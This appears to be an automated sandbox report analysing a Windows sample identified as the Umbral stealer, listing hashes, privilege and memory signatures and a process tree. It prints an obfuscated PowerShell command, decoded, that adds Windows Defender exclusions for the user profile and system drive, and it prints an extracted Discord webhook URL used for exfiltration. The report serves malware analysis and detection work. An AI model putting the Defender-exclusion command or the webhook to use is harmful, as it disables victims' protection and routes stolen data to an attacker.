Analysis
- max time kernel: 118s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 29/02/2024, 03:55
Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: idk2.exe
  Resource: win7-20240221-en
General
- Target: idk2.exe
- Size: 235KB
- MD5: ce4b4e4821aba2f7ea9aad57e60f9c3c
- SHA1: 1f01a2d44d06ced9373687ae061f81540fa1c015
- SHA256: 8d612921eca9c96803b1057e860d2d3236869bd3658b01fb7f3402134bd0300c
- SHA512: 727a3cc82dfdaede3fdcab6bd1a52794e90e3a41560345cc82212aaf75a00a09d63c753cf23b5318ad5b58126f29696bc4fbffac4f9ea1eee0af195712dae085
- SSDEEP: 6144:waeJtRSyn/TlQ1VFmqGF3+re5d0KkJ4tWDwp:wNPT/xAVPWUG0KkrD
Malware Config
Extracted
- Family: umbral
- Webhook URL (Discord): https://discord.com/api/webhooks/1205352570537775114/0TwopxZF8mZAIjdEowRHAiTqFbB8pjE6dzR2ST_E7pX5YXnZRcMh5QKMfo2QE94dAXKK
Signatures

- Detect Umbral payload (2 IoCs)
  resource                                                                    yara_rule
  behavioral1/files/0x000b000000012256-3.dat                                  family_umbral
  behavioral1/memory/1664-7-0x0000000000830000-0x0000000000870000-memory.dmp  family_umbral

- Executes dropped EXE (1 IoC)
  pid   Process
  1664  Umbral.exe

- Drops file in Windows directory (1 IoC)
  description   ioc                    Process
  File created  C:\Windows\Umbral.exe  idk2.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  1004  powershell.exe

- Suspicious use of AdjustPrivilegeToken (42 IoCs)
  description                             pid   Process
  Token: SeDebugPrivilege                 1004  powershell.exe
  Token: SeDebugPrivilege                 1664  Umbral.exe
  Token: SeIncreaseQuotaPrivilege         2700  wmic.exe
  Token: SeSecurityPrivilege              2700  wmic.exe
  Token: SeTakeOwnershipPrivilege         2700  wmic.exe
  Token: SeLoadDriverPrivilege            2700  wmic.exe
  Token: SeSystemProfilePrivilege         2700  wmic.exe
  Token: SeSystemtimePrivilege            2700  wmic.exe
  Token: SeProfSingleProcessPrivilege     2700  wmic.exe
  Token: SeIncBasePriorityPrivilege       2700  wmic.exe
  Token: SeCreatePagefilePrivilege        2700  wmic.exe
  Token: SeBackupPrivilege                2700  wmic.exe
  Token: SeRestorePrivilege               2700  wmic.exe
  Token: SeShutdownPrivilege              2700  wmic.exe
  Token: SeDebugPrivilege                 2700  wmic.exe
  Token: SeSystemEnvironmentPrivilege     2700  wmic.exe
  Token: SeRemoteShutdownPrivilege        2700  wmic.exe
  Token: SeUndockPrivilege                2700  wmic.exe
  Token: SeManageVolumePrivilege          2700  wmic.exe
  Token: 33                               2700  wmic.exe
  Token: 34                               2700  wmic.exe
  Token: 35                               2700  wmic.exe
  Token: SeIncreaseQuotaPrivilege         2700  wmic.exe
  Token: SeSecurityPrivilege              2700  wmic.exe
  Token: SeTakeOwnershipPrivilege         2700  wmic.exe
  Token: SeLoadDriverPrivilege            2700  wmic.exe
  Token: SeSystemProfilePrivilege         2700  wmic.exe
  Token: SeSystemtimePrivilege            2700  wmic.exe
  Token: SeProfSingleProcessPrivilege     2700  wmic.exe
  Token: SeIncBasePriorityPrivilege       2700  wmic.exe
  Token: SeCreatePagefilePrivilege        2700  wmic.exe
  Token: SeBackupPrivilege                2700  wmic.exe
  Token: SeRestorePrivilege               2700  wmic.exe
  Token: SeShutdownPrivilege              2700  wmic.exe
  Token: SeDebugPrivilege                 2700  wmic.exe
  Token: SeSystemEnvironmentPrivilege     2700  wmic.exe
  Token: SeRemoteShutdownPrivilege        2700  wmic.exe
  Token: SeUndockPrivilege                2700  wmic.exe
  Token: SeManageVolumePrivilege          2700  wmic.exe
  Token: 33                               2700  wmic.exe
  Token: 34                               2700  wmic.exe
  Token: 35                               2700  wmic.exe

- Suspicious use of WriteProcessMemory (11 IoCs)
  description                        pid   Process     procid_target
  PID 1032 wrote to memory of 1004   1032  idk2.exe    28
  PID 1032 wrote to memory of 1004   1032  idk2.exe    28
  PID 1032 wrote to memory of 1004   1032  idk2.exe    28
  PID 1032 wrote to memory of 1004   1032  idk2.exe    28
  PID 1032 wrote to memory of 1664   1032  idk2.exe    30
  PID 1032 wrote to memory of 1664   1032  idk2.exe    30
  PID 1032 wrote to memory of 1664   1032  idk2.exe    30
  PID 1032 wrote to memory of 1664   1032  idk2.exe    30
  PID 1664 wrote to memory of 2700   1664  Umbral.exe  31
  PID 1664 wrote to memory of 2700   1664  Umbral.exe  31
  PID 1664 wrote to memory of 2700   1664  Umbral.exe  31
Processes (process tree; nesting shows parent/child)

- C:\Users\Admin\AppData\Local\Temp\idk2.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\idk2.exe"
  PID: 1032
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbABmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAbQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAeQBzACMAPgA="
    PID: 1004
    Note: the -EncodedCommand argument is UTF-16LE base64 and decodes to: <#dca#>Add-MpPreference <#zlf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#vmg#> -Force <#wys#>
    That is, the dropper adds Windows Defender exclusions for the whole user profile and the system drive (the <#...#> block comments are junk inserted to break simple string matching). The image path is the SysWOW64 copy of PowerShell although the command line names System32, which is WoW64 file-system redirection from the 32-bit parent.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\Umbral.exe
    Command line: "C:\Windows\Umbral.exe"
    PID: 1664
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - C:\Windows\System32\Wbem\wmic.exe
      Command line: "wmic.exe" csproduct get uuid
      PID: 2700
      - Suspicious use of AdjustPrivilegeToken
Downloads
- Filesize: 230KB
  MD5: e57355d016f869b612bb5512bc9929da
  SHA1: 8d49a140dbe7ef50a1052bbb90514f84ff211daa
  SHA256: 516a9e91fdd13f05c4a8df291b9d2bb1571d5ce6223b883a6cae345cf0e75643
  SHA512: 4191df273c90a6e950bbae1931abe8d9e735ab9ff947fe0331664dcf8b96fdc50bb3436761d4e5ce190afd8a503ccad0fe2eb211b6af8a63aa6c6ae1bb7aee19